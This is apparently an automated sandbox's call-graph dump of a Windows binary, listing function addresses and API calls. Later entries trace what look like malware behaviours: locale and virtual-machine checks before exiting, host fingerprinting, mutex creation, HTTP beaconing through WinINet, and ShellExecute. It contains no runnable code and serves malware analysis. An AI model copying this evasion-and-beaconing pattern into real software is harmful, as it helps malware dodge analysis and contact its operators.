11089->11088 11090 797fd2 11089->11090 11091 79881d __dosmaperr 12 API calls 11090->11091 11092 797fd8 GetLastError 11091->11092 11092->11088 11114 797fec 11093->11114 11099 79a50a 11098->11099 11103 79a506 _unexpected 11098->11103 11099->11103 11104 79a415 11099->11104 11102 79a524 GetProcAddress 11102->11103 11103->11072 11109 79a426 ___vcrt_FlsFree 11104->11109 11105 79a4d1 11105->11102 11105->11103 11106 79a444 LoadLibraryExW 11107 79a45f GetLastError 11106->11107 11106->11109 11107->11109 11108 79a4ba FreeLibrary 11108->11109 11109->11105 11109->11106 11109->11108 11110 79a492 LoadLibraryExW 11109->11110 11110->11109 11112 798481 __dosmaperr 14 API calls 11111->11112 11113 798822 11112->11113 11113->11084 11115 797ff8 __FrameHandler3::FrameUnwindToState 11114->11115 11128 79860b EnterCriticalSection 11115->11128 11117 798002 11129 798032 11117->11129 11120 7980fe 11121 79810a __FrameHandler3::FrameUnwindToState 11120->11121 11133 79860b EnterCriticalSection 11121->11133 11123 798114 11134 7982df 11123->11134 11125 79812c 11138 79814c 11125->11138 11128->11117 11132 798653 LeaveCriticalSection 11129->11132 11131 798020 11131->11120 11132->11131 11133->11123 11135 798315 __fassign 11134->11135 11136 7982ee __fassign 11134->11136 11135->11125 11136->11135 11141 79a0c4 11136->11141 11255 798653 LeaveCriticalSection 11138->11255 11140 79813a 11140->11057 11143 79a144 11141->11143 11144 79a0da 11141->11144 11145 797fb2 _free 14 API calls 11143->11145 11167 79a192 11143->11167 11144->11143 11148 79a10d 11144->11148 11151 797fb2 _free 14 API calls 11144->11151 11146 79a166 11145->11146 11147 797fb2 _free 14 API calls 11146->11147 11149 79a179 11147->11149 11153 797fb2 _free 14 API calls 11148->11153 11166 79a12f 11148->11166 11154 797fb2 _free 14 API calls 11149->11154 11150 797fb2 _free 14 API calls 11155 79a139 11150->11155 11157 79a102 11151->11157 11152 79a1a0 11156 79a200 11152->11156 11168 797fb2 14 API calls _free 11152->11168 11158 79a124 11153->11158 11159 79a187 11154->11159 11160 797fb2 _free 14 API calls 11155->11160 11161 797fb2 _free 14 API calls 11156->11161 11169 799c2f 11157->11169 11197 799d2d 11158->11197 11164 797fb2 _free 14 API calls 11159->11164 11160->11143 11165 79a206 11161->11165 11164->11167 11165->11135 11166->11150 11209 79a235 11167->11209 11168->11152 11170 799c40 11169->11170 11196 799d29 11169->11196 11171 799c51 11170->11171 11172 797fb2 _free 14 API calls 11170->11172 11173 799c63 11171->11173 11174 797fb2 _free 14 API calls 11171->11174 11172->11171 11175 799c75 11173->11175 11176 797fb2 _free 14 API calls 11173->11176 11174->11173 11177 799c87 11175->11177 11178 797fb2 _free 14 API calls 11175->11178 11176->11175 11179 799c99 11177->11179 11180 797fb2 _free 14 API calls 11177->11180 11178->11177 11181 799cab 11179->11181 11182 797fb2 _free 14 API calls 11179->11182 11180->11179 11183 799cbd 11181->11183 11184 797fb2 _free 14 API calls 11181->11184 11182->11181 11185 799ccf 11183->11185 11186 797fb2 _free 14 API calls 11183->11186 11184->11183 11187 797fb2 _free 14 API calls 11185->11187 11188 799ce1 11185->11188 11186->11185 11187->11188 11189 799cf3 11188->11189 11190 797fb2 _free 14 API calls 11188->11190 11191 799d05 11189->11191 11192 797fb2 _free 14 API calls 11189->11192 11190->11189 11193 799d17 11191->11193 11194 797fb2 _free 14 API calls 11191->11194 11192->11191 11195 797fb2 _free 14 API calls 11193->11195 11193->11196 11194->11193 11195->11196 11196->11148 11198 799d3a 11197->11198 11199 799d92 11197->11199 11200 799d4a 11198->11200 11201 797fb2 _free 14 API calls 11198->11201 11199->11166 11202 799d5c 11200->11202 11204 797fb2 _free 14 API calls 11200->11204 11201->11200 11203 799d6e 11202->11203 11205 797fb2 _free 14 API calls 11202->11205 11206 799d80 11203->11206 11207 797fb2 _free 14 API calls 11203->11207 11204->11202 11205->11203 11206->11199 11208 797fb2 _free 14 API calls 11206->11208 11207->11206 11208->11199 11210 79a242 11209->11210 11214 79a261 11209->11214 11210->11214 11215 799dce 11210->11215 11213 797fb2 _free 14 API calls 11213->11214 11214->11152 11216 799eac 11215->11216 11217 799ddf 11215->11217 11216->11213 11251 799d96 11217->11251 11220 799d96 __fassign 14 API calls 11221 799df2 11220->11221 11222 799d96 __fassign 14 API calls 11221->11222 11223 799dfd 11222->11223 11224 799d96 __fassign 14 API calls 11223->11224 11225 799e08 11224->11225 11226 799d96 __fassign 14 API calls 11225->11226 11227 799e16 11226->11227 11228 797fb2 _free 14 API calls 11227->11228 11229 799e21 11228->11229 11230 797fb2 _free 14 API calls 11229->11230 11231 799e2c 11230->11231 11232 797fb2 _free 14 API calls 11231->11232 11233 799e37 11232->11233 11234 799d96 __fassign 14 API calls 11233->11234 11235 799e45 11234->11235 11236 799d96 __fassign 14 API calls 11235->11236 11237 799e53 11236->11237 11238 799d96 __fassign 14 API calls 11237->11238 11239 799e64 11238->11239 11240 799d96 __fassign 14 API calls 11239->11240 11241 799e72 11240->11241 11242 799d96 __fassign 14 API calls 11241->11242 11243 799e80 11242->11243 11244 797fb2 _free 14 API calls 11243->11244 11245 799e8b 11244->11245 11246 797fb2 _free 14 API calls 11245->11246 11247 799e96 11246->11247 11248 797fb2 _free 14 API calls 11247->11248 11249 799ea1 11248->11249 11250 797fb2 _free 14 API calls 11249->11250 11250->11216 11252 799dc9 11251->11252 11253 799db9 11251->11253 11252->11220 11253->11252 11254 797fb2 _free 14 API calls 11253->11254 11254->11253 11255->11140 11292 79a8f9 11256->11292 11259 79aa0c 11260 79aa18 __FrameHandler3::FrameUnwindToState 11259->11260 11261 798481 __dosmaperr 14 API calls 11260->11261 11264 79aa45 __FrameHandler3::FrameUnwindToState 11260->11264 11266 79aa3f __FrameHandler3::FrameUnwindToState 11260->11266 11261->11266 11262 79aa8c 11263 79881d __dosmaperr 14 API calls 11262->11263 11265 79aa91 11263->11265 11270 79aab8 11264->11270 11306 79860b EnterCriticalSection 11264->11306 11303 796b07 11265->11303 11266->11262 11266->11264 11269 79aa76 11266->11269 11269->11065 11272 79abeb 11270->11272 11273 79aafa 11270->11273 11283 79ab29 11270->11283 11275 79abf6 11272->11275 11311 798653 LeaveCriticalSection 11272->11311 11278 79832a _unexpected 66 API calls 11273->11278 11273->11283 11276 7976a7 __FrameHandler3::FrameUnwindToState 23 API calls 11275->11276 11282 79abfe __FrameHandler3::FrameUnwindToState 11276->11282 11280 79ab1e 11278->11280 11279 79832a _unexpected 66 API calls 11285 79ab7e 11279->11285 11281 79832a _unexpected 66 API calls 11280->11281 11281->11283 11312 79afa6 EnterCriticalSection 11282->11312 11307 79ab98 11283->11307 11285->11269 11286 79832a _unexpected 66 API calls 11285->11286 11286->11269 11287 79ac15 __FrameHandler3::FrameUnwindToState 11288 79ac4e 11287->11288 11313 79ae41 11287->11313 11323 79ac7f 11288->11323 11293 79a905 __FrameHandler3::FrameUnwindToState 11292->11293 11298 79860b EnterCriticalSection 11293->11298 11295 79a913 11299 79a951 11295->11299 11298->11295 11302 798653 LeaveCriticalSection 11299->11302 11301 797dcb 11301->11065 11301->11259 11302->11301 11304 796aa3 _Allocate 25 API calls 11303->11304 11305 796b13 11304->11305 11305->11269 11306->11270 11308 79ab9e 11307->11308 11309 79ab6f 11307->11309 11326 798653 LeaveCriticalSection 11308->11326 11309->11269 11309->11279 11309->11285 11311->11275 11312->11287 11314 79ae4e 11313->11314 11315 79ae57 11313->11315 11327 79ad37 11314->11327 11330 79addc 11315->11330 11320 79ae73 11343 79bf7b 11320->11343 11322 79ae54 11322->11288 11580 79afba LeaveCriticalSection 11323->11580 11325 79ac6d 11325->11065 11326->11309 11354 79ac8b 11327->11354 11331 79adf4 11330->11331 11335 79ae19 11330->11335 11332 79b5ca __FrameHandler3::FrameUnwindToState 25 API calls 11331->11332 11331->11335 11333 79ae12 11332->11333 11376 79c773 11333->11376 11335->11322 11336 79b5ca 11335->11336 11337 79b5eb 11336->11337 11338 79b5d6 11336->11338 11337->11320 11339 79881d __dosmaperr 14 API calls 11338->11339 11340 79b5db 11339->11340 11341 796b07 ___std_exception_copy 25 API calls 11340->11341 11342 79b5e6 11341->11342 11342->11320 11344 79bf8c 11343->11344 11345 79bf99 11343->11345 11347 79881d __dosmaperr 14 API calls 11344->11347 11346 79bfe2 11345->11346 11349 79bfc0 11345->11349 11348 79881d __dosmaperr 14 API calls 11346->11348 11353 79bf91 11347->11353 11350 79bfe7 11348->11350 11561 79bed9 11349->11561 11352 796b07 ___std_exception_copy 25 API calls 11350->11352 11352->11353 11353->11322 11355 79ac97 __FrameHandler3::FrameUnwindToState 11354->11355 11362 79860b EnterCriticalSection 11355->11362 11357 79aca1 __FrameHandler3::FrameUnwindToState 11358 79ad0d 11357->11358 11363 79abff 11357->11363 11371 79ad2b 11358->11371 11362->11357 11364 79ac0b __FrameHandler3::FrameUnwindToState 11363->11364 11374 79afa6 EnterCriticalSection 11364->11374 11366 79ac15 __FrameHandler3::FrameUnwindToState 11367 79ac4e 11366->11367 11370 79ae41 __FrameHandler3::FrameUnwindToState 66 API calls 11366->11370 11368 79ac7f __FrameHandler3::FrameUnwindToState LeaveCriticalSection 11367->11368 11369 79ac6d 11368->11369 11369->11357 11370->11367 11375 798653 LeaveCriticalSection 11371->11375 11373 79ad19 11373->11322 11374->11366 11375->11373 11377 79c77f __FrameHandler3::FrameUnwindToState 11376->11377 11378 79c79f 11377->11378 11379 79c787 11377->11379 11381 79c83a 11378->11381 11386 79c7d1 11378->11386 11401 79880a 11379->11401 11383 79880a __dosmaperr 14 API calls 11381->11383 11385 79c83f 11383->11385 11384 79881d __dosmaperr 14 API calls 11389 79c794 11384->11389 11387 79881d __dosmaperr 14 API calls 11385->11387 11404 7998e2 EnterCriticalSection 11386->11404 11390 79c847 11387->11390 11389->11335 11392 796b07 ___std_exception_copy 25 API calls 11390->11392 11391 79c7d7 11393 79c808 11391->11393 11394 79c7f3 11391->11394 11392->11389 11405 79c865 11393->11405 11396 79881d __dosmaperr 14 API calls 11394->11396 11398 79c7f8 11396->11398 11397 79c803 11447 79c832 11397->11447 11399 79880a __dosmaperr 14 API calls 11398->11399 11399->11397 11402 798481 __dosmaperr 14 API calls 11401->11402 11403 79880f 11402->11403 11403->11384 11404->11391 11408 79c887 11405->11408 11420 79c8a3 11405->11420 11406 79c88b 11407 79880a __dosmaperr 14 API calls 11406->11407 11409 79c890 11407->11409 11408->11406 11410 79c8db 11408->11410 11411 79881d __dosmaperr 14 API calls 11409->11411 11412 79c8f1 11410->11412 11450 79cefc 11410->11450 11414 79c898 11411->11414 11453 79c40c 11412->11453 11417 796b07 ___std_exception_copy 25 API calls 11414->11417 11417->11420 11418 79c938 11423 79c94c 11418->11423 11424 79c992 WriteFile 11418->11424 11419 79c8ff 11421 79c903 11419->11421 11422 79c925 11419->11422 11420->11397 11425 79c9ff 11421->11425 11460 79c3a4 11421->11460 11465 79bff8 GetConsoleOutputCP 11422->11465 11428 79c982 11423->11428 11429 79c954 11423->11429 11427 79c9b5 GetLastError 11424->11427 11434 79c91b 11424->11434 11425->11420 11436 79881d __dosmaperr 14 API calls 11425->11436 11427->11434 11493 79c47d 11428->11493 11430 79c959 11429->11430 11431 79c972 11429->11431 11430->11425 11478 79c558 11430->11478 11485 79c641 11431->11485 11434->11420 11434->11425 11439 79c9d5 11434->11439 11438 79ca20 11436->11438 11442 79880a __dosmaperr 14 API calls 11438->11442 11440 79c9dc 11439->11440 11441 79c9f3 11439->11441 11443 79881d __dosmaperr 14 API calls 11440->11443 11500 7987e7 11441->11500 11442->11420 11445 79c9e1 11443->11445 11446 79880a __dosmaperr 14 API calls 11445->11446 11446->11420 11560 799905 LeaveCriticalSection 11447->11560 11449 79c838 11449->11389 11505 79ce80 11450->11505 11527 79cb2a 11453->11527 11455 79c41d 11456 79832a _unexpected 65 API calls 11455->11456 11459 79c473 11455->11459 11457 79c440 11456->11457 11458 79c45a GetConsoleMode 11457->11458 11457->11459 11458->11459 11459->11418 11459->11419 11463 79c3fb 11460->11463 11464 79c3c6 11460->11464 11461 79c3fd GetLastError 11461->11463 11462 79cf17 5 API calls __FrameHandler3::FrameUnwindToState 11462->11464 11463->11434 11464->11461 11464->11462 11464->11463 11536 797e6f 11465->11536 11468 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11469 79c3a2 11468->11469 11469->11434 11470 79c2fa 11470->11468 11472 79b556 62 API calls __fassign 11474 79c054 __InternalCxxFrameHandler 11472->11474 11473 79c27d WriteFile 11473->11474 11475 79c372 GetLastError 11473->11475 11474->11470 11474->11472 11474->11473 11474->11474 11476 79cd4a 19 API calls __FrameHandler3::FrameUnwindToState 11474->11476 11477 79c2b5 WriteFile 11474->11477 11544 799eb2 11474->11544 11549 799625 11474->11549 11475->11470 11476->11474 11477->11474 11477->11475 11482 79c567 __FrameHandler3::FrameUnwindToState 11478->11482 11479 79c626 11480 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11479->11480 11484 79c63f 11480->11484 11481 79c5dc WriteFile 11481->11482 11483 79c628 GetLastError 11481->11483 11482->11479 11482->11481 11483->11479 11484->11434 11486 79c650 __FrameHandler3::FrameUnwindToState 11485->11486 11489 799625 __FrameHandler3::FrameUnwindToState WideCharToMultiByte 11486->11489 11490 79c75a GetLastError 11486->11490 11491 79c70f WriteFile 11486->11491 11492 79c758 11486->11492 11487 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11488 79c771 11487->11488 11488->11434 11489->11486 11490->11492 11491->11486 11491->11490 11492->11487 11498 79c48c __FrameHandler3::FrameUnwindToState 11493->11498 11494 79c53d 11495 793a94 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 11494->11495 11496 79c556 11495->11496 11496->11434 11497 79c4fc WriteFile 11497->11498 11499 79c53f GetLastError 11497->11499 11498->11494 11498->11497 11499->11494 11501 79880a __dosmaperr 14 API calls 11500->11501 11502 7987f2 __dosmaperr 11501->11502 11503 79881d __dosmaperr 14 API calls 11502->11503 11504 798805 11503->11504 11504->11420 11514 7999b9 11505->11514 11507 79ce92 11508 79ceab SetFilePointerEx 11507->11508 11509 79ce9a 11507->11509 11511 79cec3 GetLastError 11508->11511 11513 79ce9f 11508->11513 11510 79881d __dosmaperr 14 API calls 11509->11510 11510->11513 11512 7987e7 __dosmaperr 14 API calls 11511->11512 11512->11513 11513->11412 11515 7999db 11514->11515 11516 7999c6 11514->11516 11518 79880a __dosmaperr 14 API calls 11515->11518 11520 799a00 11515->11520 11517 79880a __dosmaperr 14 API calls 11516->11517 11519 7999cb 11517->11519 11521 799a0b 11518->11521 11522 79881d __dosmaperr 14 API calls 11519->11522 11520->11507 11523 79881d __dosmaperr 14 API calls 11521->11523 11524 7999d3 11522->11524 11525 799a13 11523->11525 11524->11507 11526 796b07 ___std_exception_copy 25 API calls 11525->11526 11526->11524 11528 79cb44 11527->11528 11529 79cb37 11527->11529 11531 79881d __dosmaperr 14 API calls 11528->11531 11532 79cb50 11528->11532 11530 79881d __dosmaperr 14 API calls 11529->11530 11534 79cb3c 11530->11534 11533 79cb71 11531->11533 11532->11455 11535 796b07 ___std_exception_copy 25 API calls 11533->11535 11534->11455 11535->11534 11537 797e8f 11536->11537 11543 797e86 11536->11543 11538 79832a _unexpected 66 API calls 11537->11538 11537->11543 11539 797eaf 11538->11539 11552 79b570 11539->11552 11543->11474 11545 79832a _unexpected 66 API calls 11544->11545 11546 799ebd 11545->11546 11547 79b570 __fassign 66 API calls 11546->11547 11548 799ecd 11547->11548 11548->11474 11550 79963c WideCharToMultiByte 11549->11550 11550->11474 11553 79b583 11552->11553 11555 797ec5 11552->11555 11554 79a310 __fassign 66 API calls 11553->11554 11553->11555 11554->11555 11556 79b59d 11555->11556 11557 79b5b0 11556->11557 11558 79b5c5 11556->11558 11557->11558 11559 799309 __fassign 66 API calls 11557->11559 11558->11543 11559->11558 11560->11449 11562 79bee5 __FrameHandler3::FrameUnwindToState 11561->11562 11575 7998e2 EnterCriticalSection 11562->11575 11564 79bef4 11565 79bf3b 11564->11565 11567 7999b9 __FrameHandler3::FrameUnwindToState 25 API calls 11564->11567 11566 79881d __dosmaperr 14 API calls 11565->11566 11568 79bf40 11566->11568 11569 79bf20 FlushFileBuffers 11567->11569 11576 79bf6f 11568->11576 11569->11568 11570 79bf2c 11569->11570 11572 79880a __dosmaperr 14 API calls 11570->11572 11574 79bf31 GetLastError 11572->11574 11574->11565 11575->11564 11579 799905 LeaveCriticalSection 11576->11579 11578 79bf58 11578->11353 11579->11578 11580->11325 11582 79754c 11581->11582 11583 79755d 11581->11583 11592 7975e4 GetModuleHandleW 11582->11592 11599 797404 11583->11599 11588 797597 11588->10400 11593 797551 11592->11593 11593->11583 11594 797627 GetModuleHandleExW 11593->11594 11595 79765b 11594->11595 11596 797646 GetProcAddress 11594->11596 11597 797678 11595->11597 11598 79766f FreeLibrary 11595->11598 11596->11595 11597->11583 11598->11597 11600 797410 __FrameHandler3::FrameUnwindToState 11599->11600 11615 79860b EnterCriticalSection 11600->11615 11602 79741a 11616 797451 11602->11616 11604 797427 11620 797445 11604->11620 11607 7975a2 11644 799763 GetPEB 11607->11644 11610 7975d1 11613 797627 __FrameHandler3::FrameUnwindToState 3 API calls 11610->11613 11611 7975b1 GetPEB 11611->11610 11612 7975c1 GetCurrentProcess TerminateProcess 11611->11612 11612->11610 11614 7975d9 ExitProcess 11613->11614 11615->11602 11617 79745d __FrameHandler3::FrameUnwindToState 11616->11617 11618 7974be __FrameHandler3::FrameUnwindToState 11617->11618 11623 797b65 11617->11623 11618->11604 11643 798653 LeaveCriticalSection 11620->11643 11622 797433 11622->11588 11622->11607 11626 797896 11623->11626 11627 7978a2 __FrameHandler3::FrameUnwindToState 11626->11627 11634 79860b EnterCriticalSection 11627->11634 11629 7978b0 11635 797a75 11629->11635 11634->11629 11636 797a94 11635->11636 11637 7978bd 11635->11637 11636->11637 11638 797fb2 _free 14 API calls 11636->11638 11639 7978e5 11637->11639 11638->11637 11642 798653 LeaveCriticalSection 11639->11642 11641 7978ce 11641->11618 11642->11641 11643->11622 11645 79977d 11644->11645 11646 7975ac 11644->11646 11648 79a55f 11645->11648 11646->11610 11646->11611 11649 79a4dc _unexpected 5 API calls 11648->11649 11650 79a57b 11649->11650 11650->11646 11652 797d18 ___scrt_uninitialize_crt 11651->11652 11653 797d06 11651->11653 11652->10445 11654 797d14 11653->11654 11656 79ae89 11653->11656 11654->10445 11657 79ad37 ___scrt_uninitialize_crt 66 API calls 11656->11657 11658 79ae90 11657->11658 11658->11654 11659 11f8dd0 GetUserDefaultLangID 11660 11f8e7c ExitProcess 11659->11660 11661 11f8ded 11659->11661 11661->11660 11675 11f8620 11661->11675 11663 11f8e5a 11663->11660 11664 11f8e5e 11663->11664 11754 11f8340 InitializeCriticalSection 11664->11754 11666 11f8e63 11764 11f7170 ExpandEnvironmentStringsW lstrlenW 11666->11764 11668 11f8e68 11771 11f8f40 CryptGenRandom 11668->11771 11674 11f8e77 11674->11660 11676 11f862d 11675->11676 11677 11f8642 EnumDisplayDevicesW 11676->11677 11678 11f86da GetModuleHandleA GetProcAddress GetProcAddress 11677->11678 11679 11f866a 11677->11679 11681 11f8716 ExpandEnvironmentStringsW ExpandEnvironmentStringsW GetFileAttributesW 11678->11681 11682 11f8710 11678->11682 11680 11f8670 StrStrIW 11679->11680 11683 11f8687 StrStrIW 11680->11683 11684 11f8775 11680->11684 11685 11f877e SHGetFolderPathW SHGetFolderPathW PathCombineW GetFileAttributesW 11681->11685 11686 11f8756 11681->11686 11682->11681 11683->11684 11688 11f869d StrStrIW 11683->11688 11684->11663 11695 11f87d6 11685->11695 11686->11685 11689 11f875a GetFileAttributesW 11686->11689 11688->11684 11691 11f86b3 StrStrIW 11688->11691 11689->11685 11690 11f8768 11689->11690 11690->11685 11692 11f876c 11690->11692 11691->11684 11693 11f86c9 EnumDisplayDevicesW 11691->11693 11692->11684 11693->11678 11693->11680 11694 11f8805 PathCombineW GetFileAttributesW 11694->11695 11695->11684 11695->11694 11696 11f8849 11695->11696 11696->11684 11697 11f8858 PathCombineW PathCombineW GetFileAttributesW 11696->11697 11698 11f8a1e PathCombineW GetFileAttributesW 11697->11698 11699 11f88a0 11697->11699 11701 11f8b09 ExpandEnvironmentStringsW GetFileAttributesW 11698->11701 11702 11f8a49 11698->11702 11699->11698 11700 11f88a8 GetFileAttributesW 11699->11700 11700->11698 11705 11f88ba 11700->11705 11703 11f8b2e 11701->11703 11704 11f8b53 GetComputerNameW GetUserNameW 11701->11704 11702->11701 11706 11f8a51 CreateFileW 11702->11706 11703->11704 11707 11f8b32 GetFileAttributesExW 11703->11707 11709 11f8bc0 lstrcmpW 11704->11709 11705->11698 11708 11f88c2 CreateFileW 11705->11708 11710 11f8a7f GetFileSize GetProcessHeap HeapAlloc 11706->11710 11711 11f8ac2 11706->11711 11707->11704 11712 11f8b49 11707->11712 11713 11f893e CreateFileW 11708->11713 11714 11f88fd GetFileSize GetProcessHeap HeapAlloc 11708->11714 11709->11684 11715 11f8bd8 11709->11715 11716 11f8ab9 CloseHandle 11710->11716 11717 11f8aa0 ReadFile 11710->11717 11718 11f8acc lstrcmpA 11711->11718 11719 11f8aeb 11711->11719 11712->11684 11712->11704 11723 11f89a8 11713->11723 11724 11f8965 GetFileSize GetProcessHeap HeapAlloc 11713->11724 11720 11f8937 CloseHandle 11714->11720 11721 11f8920 ReadFile 11714->11721 11715->11709 11722 11f8bdf StrStrW 11715->11722 11716->11711 11717->11716 11718->11719 11725 11f8aff 11719->11725 11726 11f8aef GetProcessHeap HeapFree 11719->11726 11720->11713 11721->11720 11722->11684 11727 11f8bf9 11722->11727 11730 11f89e9 11723->11730 11734 11f89b8 lstrcmpA 11723->11734 11728 11f899f CloseHandle 11724->11728 11729 11f8986 ReadFile 11724->11729 11725->11684 11725->11701 11726->11725 11733 11f8c10 lstrcmpW 11727->11733 11738 11f8c2c GlobalMemoryStatusEx 11727->11738 11728->11723 11729->11728 11731 11f8a00 11730->11731 11732 11f89f0 GetProcessHeap HeapFree 11730->11732 11736 11f8a14 11731->11736 11737 11f8a04 GetProcessHeap HeapFree 11731->11737 11732->11731 11733->11684 11733->11727 11734->11730 11735 11f89ca lstrcmpA 11734->11735 11735->11730 11736->11684 11736->11698 11737->11736 11738->11684 11739 11f8c5f PathCombineW 11738->11739 11740 11f8c80 11739->11740 11740->11740 11741 11f8c90 FindFirstFileW 11740->11741 11742 11f8da2 GetModuleFileNameW StrStrIW 11741->11742 11743 11f8cb0 11741->11743 11742->11663 11744 11f8cc0 lstrcmpW 11743->11744 11745 11f8cd6 lstrcmpW 11744->11745 11746 11f8d74 FindNextFileW 11744->11746 11745->11746 11747 11f8cec lstrcmpW 11745->11747 11746->11744 11748 11f8d8a FindClose 11746->11748 11750 11f8d2b lstrcmpW 11747->11750 11751 11f8d37 lstrcmpW 11747->11751 11748->11684 11748->11742 11750->11751 11752 11f8d4f 11750->11752 11751->11752 11753 11f8d43 lstrcmpW 11751->11753 11752->11746 11753->11752 11755 11f8373 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 11754->11755 11811 11f7010 11754->11811 11757 11f842f 11755->11757 11758 11f8521 ExitProcess 11755->11758 11819 11f24a0 GetTickCount 11757->11819 11760 11f8434 WSAStartup CryptAcquireContextA 11761 11f847f CryptAcquireContextA 11760->11761 11763 11f849f 11760->11763 11761->11758 11761->11763 11762 11f84d1 CoInitializeEx ExpandEnvironmentStringsW CreateFileW 11762->11666 11763->11762 11763->11763 11765 11f71b7 GetSystemWow64DirectoryW 11764->11765 11766 11f71a4 ExpandEnvironmentStringsW 11764->11766 11767 11f71cd GetLastError 11765->11767 11768 11f71d3 ExpandEnvironmentStringsW wnsprintfW 11765->11768 11766->11765 11767->11768 11821 11f6bc0 VariantInit CoCreateInstance 11768->11821 11772 11f8f7c 11771->11772 11857 11f2640 GetProcessHeap HeapAlloc 11772->11857 11775 11f8fbe 11777 11f2640 2 API calls 11775->11777 11776 11f8fb2 GetProcessHeap HeapFree 11776->11775 11778 11f8fcd 11777->11778 11779 11f8fd6 wsprintfA 11778->11779 11780 11f8e6d 11778->11780 11781 11f9001 11779->11781 11784 11f7650 GetPEB LsaOpenPolicy 11780->11784 11783 11f901f GetProcessHeap HeapFree GetProcessHeap HeapFree 11781->11783 11859 11f66a0 ObtainUserAgentString MultiByteToWideChar 11781->11859 11783->11780 11785 11f770b GetComputerNameW GetUserNameW 11784->11785 11786 11f7696 LsaQueryInformationPolicy 11784->11786 11787 11f775b 11785->11787 11788 11f76a9 11786->11788 11789 11f7702 LsaClose 11786->11789 11792 11f24a0 GetTickCount 11787->11792 11794 11f778a 11787->11794 11790 11f76fb LsaFreeMemory 11788->11790 11791 11f76b1 GetProcessHeap HeapAlloc 11788->11791 11789->11785 11790->11789 11793 11f76ce 11791->11793 11792->11787 11793->11790 11795 11f7799 wsprintfA wsprintfA 11794->11795 11796 11f77f6 11795->11796 11797 11f66a0 32 API calls 11796->11797 11798 11f782a 11797->11798 11799 11f783d GetProcessHeap HeapFree 11798->11799 11800 11f7845 11798->11800 11799->11800 11801 11f7849 GetProcessHeap HeapFree 11800->11801 11802 11f7851 11800->11802 11801->11802 11803 11f8530 ExpandEnvironmentStringsW ExpandEnvironmentStringsW ExpandEnvironmentStringsW 11802->11803 11804 11f8580 11803->11804 11804->11804 11805 11f8590 GetFileAttributesW 11804->11805 11806 11f85af GetFileAttributesW 11805->11806 11807 11f85a4 11805->11807 11808 11f85d3 wnsprintfW ShellExecuteW 11806->11808 11810 11f85a8 11806->11810 11807->11806 11807->11810 11808->11674 11809 11f85c6 lstrcpyW 11809->11808 11810->11808 11810->11809 11812 11f702e RegOpenKeyExW 11811->11812 11813 11f7051 RegQueryValueExW 11812->11813 11814 11f709d 11812->11814 11813->11814 11815 11f7069 GetProcessHeap HeapAlloc 11813->11815 11814->11812 11817 11f70a0 RegCloseKey 11814->11817 11818 11f70cb 11814->11818 11815->11814 11816 11f7085 RegQueryValueExW 11815->11816 11816->11817 11817->11814 11817->11818 11818->11755 11820 11f24b0 11819->11820 11820->11760 11820->11820 11822 11f6c1b 11821->11822 11829 11f6c6a 11821->11829 11825 11f6c4c SysAllocString 11822->11825 11822->11829 11823 11f6c8d SysFreeString 11824 11f6c90 11823->11824 11826 11f6fd8 SetFileAttributesW 11824->11826 11827 11f6c9a SysAllocString 11824->11827 11825->11829 11826->11668 11828 11f6cbd SysFreeString 11827->11828 11830 11f6ced 11828->11830 11831 11f6ccd SysAllocString 11828->11831 11829->11823 11829->11824 11832 11f6cf1 SysAllocString 11830->11832 11835 11f6d09 11830->11835 11833 11f6ce4 SysFreeString 11831->11833 11834 11f6d06 SysFreeString 11832->11834 11833->11830 11834->11835 11835->11826 11836 11f6d3f SysAllocString 11835->11836 11839 11f6d77 11835->11839 11837 11f6d52 SysFreeString SysAllocString 11836->11837 11838 11f6d68 SysFreeString 11837->11838 11838->11839 11840 11f6ddb 11839->11840 11841 11f6db9 SysAllocString 11839->11841 11844 11f6e3a SysAllocString 11840->11844 11846 11f6e9d 11840->11846 11842 11f6dcc SysFreeString 11841->11842 11842->11840 11843 11f6f3d 11843->11826 11847 11f6f66 VariantInit SysAllocString SysAllocString 11843->11847 11845 11f6e4d SysFreeString SysAllocString 11844->11845 11849 11f6e63 SysFreeString 11845->11849 11846->11843 11850 11f6f0e SysAllocString 11846->11850 11848 11f6fc8 SysFreeString VariantClear 11847->11848 11848->11826 11851 11f6e7a 11849->11851 11852 11f6f21 SysFreeString 11850->11852 11851->11846 11853 11f6e7e SysAllocString 11851->11853 11852->11843 11854 11f6f2b SysAllocString 11852->11854 11855 11f6e91 SysFreeString 11853->11855 11856 11f6f3a SysFreeString 11854->11856 11855->11846 11856->11843 11858 11f267c 11857->11858 11858->11775 11858->11776 11860 11f66ea 11859->11860 11861 11f66f1 GetProcessHeap HeapAlloc 11859->11861 11888 11f64e0 11860->11888 11861->11860 11862 11f670f MultiByteToWideChar 11861->11862 11862->11860 11864 11f6738 11865 11f673a InternetOpenW 11864->11865 11866 11f6776 InternetSetOptionW 11864->11866 11867 11f68e6 11864->11867 11865->11864 11866->11866 11868 11f678d InternetConnectW 11866->11868 11869 11f68f9 GetProcessHeap HeapFree 11867->11869 11870 11f6901 11867->11870 11871 11f68c8 InternetCloseHandle 11868->11871 11872 11f67b1 HttpOpenRequestW 11868->11872 11869->11870 11873 11f6908 GetProcessHeap HeapFree 11870->11873 11874 11f6910 11870->11874 11871->11864 11871->11867 11877 11f68bc 11872->11877 11878 11f67e7 InternetQueryOptionW 11872->11878 11873->11874 11875 11f691f 11874->11875 11876 11f6917 GetProcessHeap HeapFree 11874->11876 11875->11781 11876->11875 11879 11f68c2 InternetCloseHandle 11877->11879 11880 11f680a InternetSetOptionW 11878->11880 11881 11f6820 HttpSendRequestW 11878->11881 11879->11871 11880->11881 11882 11f68b1 InternetCloseHandle 11881->11882 11884 11f6838 11881->11884 11882->11879 11883 11f6840 InternetQueryDataAvailable 11883->11884 11884->11882 11884->11883 11885 11f6878 GetProcessHeap HeapReAlloc 11884->11885 11886 11f6867 GetProcessHeap HeapAlloc 11884->11886 11887 11f6888 InternetReadFile 11885->11887 11886->11887 11887->11884 11889 11f64f0 InternetCrackUrlW 11888->11889 11891 11f6553 GetProcessHeap HeapAlloc 11889->11891 11894 11f65ee 11889->11894 11893 11f657c GetProcessHeap HeapAlloc 11891->11893 11891->11894 11893->11894 11894->11864

                Control-flow Graph

                • Executed
                • Not Executed
